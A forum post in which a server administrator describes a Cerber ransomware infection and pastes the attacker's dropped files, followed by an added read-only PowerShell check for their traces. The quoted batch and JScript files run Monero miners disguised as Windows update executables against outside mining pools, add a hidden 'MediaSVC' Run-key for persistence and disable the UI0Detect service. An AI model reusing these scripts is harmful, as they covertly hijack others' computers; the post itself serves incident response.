I have a server (2012) that was hit with Cerber 4/5 ransomware yesterday. I uploaded the ransom note and file to identify.
File names were changed to <random>.8ecd
I found the folder where the executable was and it has a few batch programs that ran to encrypt it. I didn't know if it contained the unlock key
Contents of 1.bat
KB890830.exe -t 1 -a cryptonight -o stratum+tcp://xmr-usa.dwarfpool.com:8005 -u 45GoL25ZEzi4F3cdJoH6cZ7Ufr65AqSyyGe6c87cuFC3DrFdDYFAjeq9conorAjzL5V24wRYigTjJDVzch6pNDRb7d7FMz9 -p x
pause
KB3199986.exe -t 1 -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 45GoL25ZEzi4F3cdJoH6cZ7Ufr65AqSyyGe6c87cuFC3DrFdDYFAjeq9conorAjzL5V24wRYigTjJDVzch6pNDRb7d7FMz9 -p x
pause
Contents of min.js
var WSHShell = WScript.CreateObject("WScript.Shell");
WSHShell.Run("c:/Users/Public/Music/jb-JP/aes/KB890830.exe -t 1 -a cryptonight -o stratum+tcp://xmr-usa.dwarfpool.com:8005 -u 45GoL25ZEzi4F3cdJoH6cZ7Ufr65AqSyyGe6c87cuFC3DrFdDYFAjeq9conorAjzL5V24wRYigTjJDVzch6pNDRb7d7FMz9 -p x", 0)
WSHShell.Run("c:/Users/Public/Music/jb-JP/aes/KB3199986.exe -t 2 -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 45GoL25ZEzi4F3cdJoH6cZ7Ufr65AqSyyGe6c87cuFC3DrFdDYFAjeq9conorAjzL5V24wRYigTjJDVzch6pNDRb7d7FMz9 -p x", 0)
Contents of run.bat
Reg Add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "MediaSVC" /t REG_SZ /d "c:\Users\Public\Music\jb-JP\aes\min.js" /f
pause
Contents of disable_UI0Detect.bat
sc config UI0Detect start= disabled
sc stop UI0Detect
pause
I've run a virus scan and it has removed the KB*.exe files, though it left behind the batch and js. The registry entry in "run.bat" does not exist.
There were a few files that were hit that weren't part of the backup, so we've saved them in hopes of a decryption tool being released.
Any other steps I should take?
Looking at it again, I guess the long string was a username. Question still stands I guess
Edited by CCSC, 23 December 2016 - 10:31 AM.
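An added check (not part of the original post or any reply) that looks, read-only, for the artifacts the posted scripts leave behind: the "MediaSVC" Run value, the disabled UI0Detect service, the drop directory and any wscript.exe still running the loader. Paths, value name and service name come from the scripts above; it assumes an elevated PowerShell session on the affected Server 2012 host.

```powershell
# Added example, not from the original post. Read-only: it reports, it does not remove anything.
$dropDir   = 'C:\Users\Public\Music\jb-JP\aes'   # drop path from min.js / run.bat
$valueName = 'MediaSVC'                           # Run value name from run.bat
$findings  = @()

# 1. run.bat writes to HKCU, i.e. the hive of whichever account ran it.
#    Walk every loaded hive under HKEY_USERS so a value created by another
#    profile is not missed when checking only the current user's HKCU.
Get-ChildItem 'Registry::HKEY_USERS' -ErrorAction SilentlyContinue | ForEach-Object {
    $runKey = "Registry::$($_.Name)\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
    $props  = Get-ItemProperty -Path $runKey -ErrorAction SilentlyContinue
    if ($props -and ($props.PSObject.Properties.Name -contains $valueName)) {
        $findings += "Run value '$valueName' in $runKey -> $($props.$valueName)"
    }
}

# 2. disable_UI0Detect.bat sets the Interactive Services Detection service to disabled.
$svc = Get-CimInstance Win32_Service -Filter "Name='UI0Detect'" -ErrorAction SilentlyContinue
if ($svc -and $svc.StartMode -eq 'Disabled') {
    $findings += "Service UI0Detect start type is Disabled (state: $($svc.State))"
}

# 3. Leftover batch/js files in the drop directory (the AV removed only the exe files).
if (Test-Path $dropDir) {
    Get-ChildItem $dropDir -Recurse -File | ForEach-Object {
        $findings += "Leftover file: $($_.FullName) ($($_.Length) bytes, written $($_.LastWriteTime))"
    }
}

# 4. A wscript.exe instance still running min.js from the drop directory.
Get-CimInstance Win32_Process -Filter "Name='wscript.exe'" -ErrorAction SilentlyContinue |
    Where-Object { $_.CommandLine -like '*jb-JP*' } |
    ForEach-Object { $findings += "Running: PID $($_.ProcessId) $($_.CommandLine)" }

if ($findings.Count -gt 0) { $findings | ForEach-Object { Write-Output "[!] $_" } }
else { Write-Output 'No MediaSVC / UI0Detect / jb-JP artifacts found.' }
```

Any hit in section 1 or 4 means the persistence is still live for that profile; the miner was a separate payload from the Cerber encryption, so a clean result here says nothing about recovering the .8ecd files.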